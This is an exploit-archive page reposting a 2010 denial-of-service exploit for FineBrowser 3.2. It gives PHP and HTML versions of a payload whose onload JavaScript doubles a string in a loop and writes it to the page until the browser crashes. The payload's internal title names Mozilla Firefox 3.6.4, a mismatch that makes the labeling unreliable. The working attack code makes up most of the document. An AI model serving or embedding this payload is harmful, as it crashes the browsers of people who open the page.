Home / os / win7

FineBrowser v.3.2 Denial of Service Exploit

Posted on 29 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>FineBrowser v.3.2 Denial of Service Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================== FineBrowser v.3.2 Denial of Service Exploit =========================================== ############################################################################## # [+]Title: [FineBrowser v.3.2 Denial of Service Exploit] ############################################################################## # [+] About : ############################################################################## # Author : GlaDiaT0R # Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com # Team : Tunisian Power Team ( DarkGh0st.Net ) # Greetz : ALLAH ! , Boomrang_victim, Marwen_Neo, Alphanix, Zigma &amp; my friends ############################################################################## [+] : It's let FineBrowser 3.2 crashing simply with opening the exploit.php or exploit.html [+] : Exploit ===================== PHP ===================== exploit.php &lt;?php echo &quot;&lt;html&gt;&lt;title&gt;Mozilla Firefox 3.6.4 Denial of Service Exploit &lt;/title&gt; &quot;; echo &quot;&lt;script&gt; &quot;; echo &quot;function junk() &quot;; echo &quot;{ &quot;; echo &quot;var buff=&quot;A&quot;; &quot;; echo &quot;for (i=0;i&lt;787;i++) &quot;; echo &quot;{ &quot;; echo &quot;buff+=buff+&quot;A&quot;; &quot;; echo &quot;document.write(buff+buff); &quot;; echo &quot;} &quot;; echo &quot;} &quot;; echo &quot;&lt;/script&gt; &quot;; echo &quot;&lt;body onload=&quot;javascript:junk();&quot;&gt; &quot;; echo &quot;&lt;font color=white&gt;the_gl4di4t0r&lt;font color=&quot;grey&quot;&gt;[AT]&lt;/font&gt;hotmail&lt;font color=&quot;grey&quot;&gt;[DOT]&lt;/font&gt;com&lt;/font&gt; &quot;; echo &quot;&lt;/body&gt; &quot;; echo &quot;&lt;/html&gt; &quot;; echo &quot; &quot;; ?&gt; ===================== HTML ===================== exploit.html &lt;html&gt;&lt;title&gt;Mozilla Firefox 3.6.4 Denial of Service Exploit &lt;/title&gt; &lt;script&gt; function junk() { var buff=&quot;A&quot;; for (i=0;i&lt;787;i++) { buff+=buff+&quot;A&quot;; document.write(buff+buff); } } &lt;/script&gt; &lt;body onload=&quot;javascript:junk();&quot;&gt; &lt;font color=white&gt;the_gl4di4t0r&lt;font color=&quot;grey&quot;&gt;[AT]&lt;/font&gt;hotmail&lt;font color=&quot;grey&quot;&gt;[DOT]&lt;/font&gt;com&lt;/font&gt; &lt;/body&gt; &lt;/html&gt; ############################################################## Notice: I'M MUSLIM ############################################################## # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP